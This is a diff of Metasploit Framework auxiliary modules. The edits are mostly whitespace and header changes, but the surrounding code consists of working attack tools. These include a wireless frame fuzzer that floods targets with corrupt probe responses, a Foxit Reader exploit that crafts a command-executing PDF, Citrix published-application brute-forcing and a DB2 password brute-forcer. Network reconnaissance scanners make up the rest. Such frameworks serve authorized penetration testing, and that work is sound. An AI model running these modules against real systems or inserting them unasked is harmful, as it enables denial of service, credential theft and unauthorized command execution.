"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
d = Rex::Text.rand_text(l)
|
||||
frame += t.chr + l.chr + d
|
||||
end
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Probe Response Frame Fuzzer',
|
||||
'Description' => %q{
|
||||
This module sends out corrupted probe response frames.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def ping_check
|
||||
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
srand(0)
|
||||
|
||||
|
||||
@@uni = 0
|
||||
|
||||
|
||||
frames = []
|
||||
|
||||
|
||||
open_wifi
|
||||
|
||||
|
||||
print_status("Sending corrupt frames...")
|
||||
|
||||
|
||||
while (true)
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
if (datastore['PING_HOST'])
|
||||
|
||||
|
||||
if (frames.length >= 5)
|
||||
frames.shift
|
||||
frames.push(frame)
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
frames.push(frame)
|
||||
end
|
||||
|
||||
1.upto(10) do
|
||||
1.upto(10) do
|
||||
wifi.write(frame)
|
||||
if (not ping_check())
|
||||
frames.each do |f|
|
||||
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status f.inspect
|
||||
end
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
else
|
||||
wifi.write(frame)
|
||||
end
|
||||
end
|
||||
@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) # capability flags
|
||||
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
||||
|
||||
# ssid tag
|
||||
frame << "\x00" + ssid.length.chr + ssid
|
||||
|
||||
# supported rates
|
||||
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
|
||||
|
||||
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
|
||||
|
||||
# current channel
|
||||
frame << "\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
1.upto(ies) do |i|
|
||||
max = mtu - frame.length
|
||||
break if max < 2
|
||||
@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
d = Rex::Text.rand_text(l)
|
||||
frame += t.chr + l.chr + d
|
||||
end
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
|
||||
]
|
||||
))
|
||||
@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
connect_udp
|
||||
|
||||
|
||||
print_status("Attempting to contact Citrix ICA service...")
|
||||
|
||||
client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
udp_sock.put(client_connect)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,server_response.length] == server_response)
|
||||
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '50617' ],
|
||||
[ 'BID', '5817' ],
|
||||
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
|
||||
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
connect_udp
|
||||
|
||||
|
||||
print_status("Attempting to contact Citrix ICA service...")
|
||||
|
||||
client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:)
|
||||
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application
|
||||
application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published
|
||||
|
||||
|
||||
udp_sock.put(client_connect)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,server_response.length] == server_response)
|
||||
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
|
||||
|
||||
@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"
|
||||
packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00"
|
||||
packet << client + "\x00"
|
||||
|
||||
|
||||
udp_sock.put(packet)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,application_valid.length] == application_valid)
|
||||
print_status("Found: #{application}")
|
||||
end
|
||||
|
||||
|
||||
if (res[0,application_invalid.length] == application_invalid)
|
||||
print_error("NOT Found: #{application}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
else
|
||||
print_error("Server did not respond.")
|
||||
end
|
||||
|
@ -1,9 +1,13 @@
|
||||
###
|
||||
## This file is part of the Metasploit Framework and may be subject to
|
||||
## redistribution and commercial restrictions. Please see the Metasploit
|
||||
## Framework web site for more information on licensing and terms of use.
|
||||
## http://metasploit.com/framework/
|
||||
###
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'zlib'
|
||||
@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Foxit Reader Authorization Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits a authorization bypass vulnerability in Foxit Reader
|
||||
build 1120. When a attacker creates a specially crafted pdf file containing
|
||||
a Open/Execute action, arbitrary commands can be executed without confirmation
|
||||
from the victim.
|
||||
build 1120. When a attacker creates a specially crafted pdf file containing
|
||||
a Open/Execute action, arbitrary commands can be executed without confirmation
|
||||
from the victim.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
|
||||
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0836' ],
|
||||
[ 'BID', '34035' ],
|
||||
@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DisclosureDate' => 'Mar 9 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Create the pdf
|
||||
pdf = make_pdf(exec)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ioDef(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def ioRef(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(exec)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
|
||||
# Randomize PDF version?
|
||||
pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
|
||||
pdf << "%" << RandomNonASCIIString(4) << eol
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -14,12 +14,12 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::DB2
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Authentication Brute Force Utility',
|
||||
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => ['todb'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
|
||||
File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
info = db2_check_login
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
|
||||
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
|
||||
return :abort
|
||||
rescue ::Rex::Proto::DRDA::RespError => e
|
||||
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
|
||||
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
|
||||
return :abort
|
||||
end
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::DB2
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Probe Utility',
|
||||
@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(ip)
|
||||
verbose = datastore['VERBOSE']
|
||||
begin
|
||||
|
||||
|
||||
info = db2_probe(2)
|
||||
if info[:excsatrd]
|
||||
inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth]
|
||||
report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}"
|
||||
print_status("#{ip}:#{rport} DB2 - #{report_info}")
|
||||
report_service(
|
||||
:host => rhost,
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:name => "db2",
|
||||
:info => report_info
|
||||
)
|
||||
end
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
|
||||
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
|
||||
return :done
|
||||
rescue ::Rex::Proto::DRDA::RespError => e
|
||||
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
|
||||
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
|
||||
return :error
|
||||
end
|
||||
end
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
@ -8,11 +12,11 @@
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Exploit::Remote::Udp
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Discovery Service Detection.',
|
||||
@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(523),], self.class)
|
||||
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00"
|
||||
|
||||
begin
|
||||
@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect_udp
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
|
||||
res = udp_sock.read(1024).split(/\x00/)
|
||||
|
||||
|
||||
if (res)
|
||||
report_note(
|
||||
:host => ip,
|
||||
@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
disconnect_udp
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Errno::EPIPE
|
||||
rescue ::Errno::EPIPE
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Hidden DCERPC Service Discovery',
|
||||
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Description' => %q{
|
||||
This module will query the endpoint mapper and make a list
|
||||
of all ncacn_tcp RPC services. It will then connect to each of
|
||||
these services and use the management API to list all other
|
||||
these services and use the management API to list all other
|
||||
RPC services accessible on this port. Any RPC service found attached
|
||||
to a TCP port, but not listed in the endpoint mapper, will be displayed
|
||||
and analyzed to see whether anonymous access is permitted.
|
||||
@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
deregister_options('RHOST', 'RPORT')
|
||||
end
|
||||
|
||||
# Obtain information about a single host
|
||||
def run_host(ip)
|
||||
def run_host(ip)
|
||||
begin
|
||||
|
||||
epm = dcerpc_endpoint_list()
|
||||
@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Could not contact the endpoint mapper on #{ip}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
eports = {}
|
||||
|
||||
|
||||
epm.each do |ep|
|
||||
next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp")
|
||||
eports[ep[:port]] ||= {}
|
||||
eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true
|
||||
end
|
||||
|
||||
|
||||
eports.each_pair do |eport, servs|
|
||||
|
||||
|
||||
rport = eport
|
||||
print_status("Looking for services on #{ip}:#{rport}...")
|
||||
|
||||
|
||||
ids = dcerpc_mgmt_inq_if_ids(rport)
|
||||
return if not ids
|
||||
|
||||
|
||||
ids.each do |id|
|
||||
if (not servs.has_key?(id[0]+'_'+id[1]))
|
||||
print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}")
|
||||
|
||||
|
||||
conn = nil
|
||||
bind = nil
|
||||
call = nil
|
||||
@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
res = dcerpc.call(0, NDR.long(0) * 128)
|
||||
call = true
|
||||
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
data = dcerpc.last_response.stub_data
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
error = e.to_s
|
||||
end
|
||||
|
||||
|
||||
if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/)
|
||||
call = true
|
||||
end
|
||||
|
||||
|
||||
status = "\t\t"
|
||||
status << "CONN " if conn
|
||||
status << "BIND " if bind
|
||||
status << "CALL " if call
|
||||
status << "DATA=#{data.unpack("H*")[0]} " if data
|
||||
status << "ERROR=#{error} " if error
|
||||
|
||||
|
||||
print_status(status)
|
||||
print_status("")
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Remote Management Interface Discovery',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module can be used to obtain information from the Remote
|
||||
This module can be used to obtain information from the Remote
|
||||
Management Interface DCERPC service.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
deregister_options('RHOST')
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(135)
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Obtain information about a single host
|
||||
def run_host(ip)
|
||||
def run_host(ip)
|
||||
begin
|
||||
|
||||
ids = dcerpc_mgmt_inq_if_ids(rport)
|
||||
return if not ids
|
||||
ids.each do |id|
|
||||
print_status("UUID #{id[0]} v#{id[1]}")
|
||||
|
||||
|
||||
stats = dcerpc_mgmt_inq_if_stats(rport)
|
||||
print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats
|
||||
|
||||
|
||||
live = dcerpc_mgmt_is_server_listening(rport)
|
||||
print_status("\t listening: %.8x" % live) if live
|
||||
|
||||
@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
princ = dcerpc_mgmt_inq_princ_name(rport)
|
||||
print_status("\t name: #{princ.unpack("H*")[0]}") if princ
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
@ -1,5 +1,15 @@
|
||||
require 'msf/core'
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'ARP Sweep Local Network Discovery',
|
||||
@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'belch',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([
|
||||
OptString.new('SHOST', [true, "Source IP Address"]),
|
||||
OptString.new('SMAC', [true, "Source MAC Address"]),
|
||||
], self.class)
|
||||
|
||||
|
||||
deregister_options('SNAPLEN', 'FILTER')
|
||||
end
|
||||
|
||||
@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run_batch(hosts)
|
||||
|
||||
shost = datastore['SHOST']
|
||||
|
||||
shost = datastore['SHOST']
|
||||
smac = datastore['SMAC']
|
||||
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
|
||||
|
||||
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
|
||||
|
||||
begin
|
||||
|
||||
|
||||
hosts.each do |dhost|
|
||||
probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost)
|
||||
capture.inject(probe)
|
||||
@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||
while(reply = getreply())
|
||||
next if not reply[:arp]
|
||||
print_status("#{reply[:arp].spa} appears to be up.")
|
||||
|
||||
|
||||
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
etime = Time.now.to_f + (hosts.length * 0.05)
|
||||
while (Time.now.to_f < etime)
|
||||
while(reply = getreply())
|
||||
next if not reply[:arp]
|
||||
print_status("#{reply[:arp].spa} appears to be up.")
|
||||
|
||||
|
||||
report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha)
|
||||
end
|
||||
Kernel.select(nil, nil, nil, 0.50)
|
||||
end
|
||||
|
||||
|
||||
ensure
|
||||
close_pcap()
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def buildprobe(shost, smac, dhost)
|
||||
n = Racket::Racket.new
|
||||
n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14))
|
||||
n.l2.src_mac = smac
|
||||
n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff'
|
||||
n.l2.ethertype = 0x0806
|
||||
|
||||
|
||||
n.l3 = Racket::L3::ARP.new
|
||||
n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST
|
||||
n.l3.sha = n.l2.src_mac
|
||||
@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.tpa = dhost
|
||||
n.pack
|
||||
end
|
||||
|
||||
|
||||
def getreply
|
||||
pkt = capture.next
|
||||
return if not pkt
|
||||
|
||||
|
||||
eth = Racket::L2::Ethernet.new(pkt)
|
||||
return if not eth.ethertype == 0x0806
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -10,10 +14,10 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'EMC AlphaStor Device Manager Service.',
|
||||
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(3000),], self.class)
|
||||
end
|
||||
|
||||
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect
|
||||
|
||||
pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(0.25)
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Host #{ip} is running the EMC AlphaStor Device Manager.")
|
||||
else
|
||||
print_error("Host #{ip} is not running the service...")
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -10,10 +14,10 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'EMC AlphaStor Library Manager Service.',
|
||||
@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(3500),], self.class)
|
||||
end
|
||||
|
||||
@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect
|
||||
|
||||
pkt = "\x51" + "\x00" * 529
|
||||
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(1)
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Host #{ip} is running the EMC AlphaStor Library Manager.")
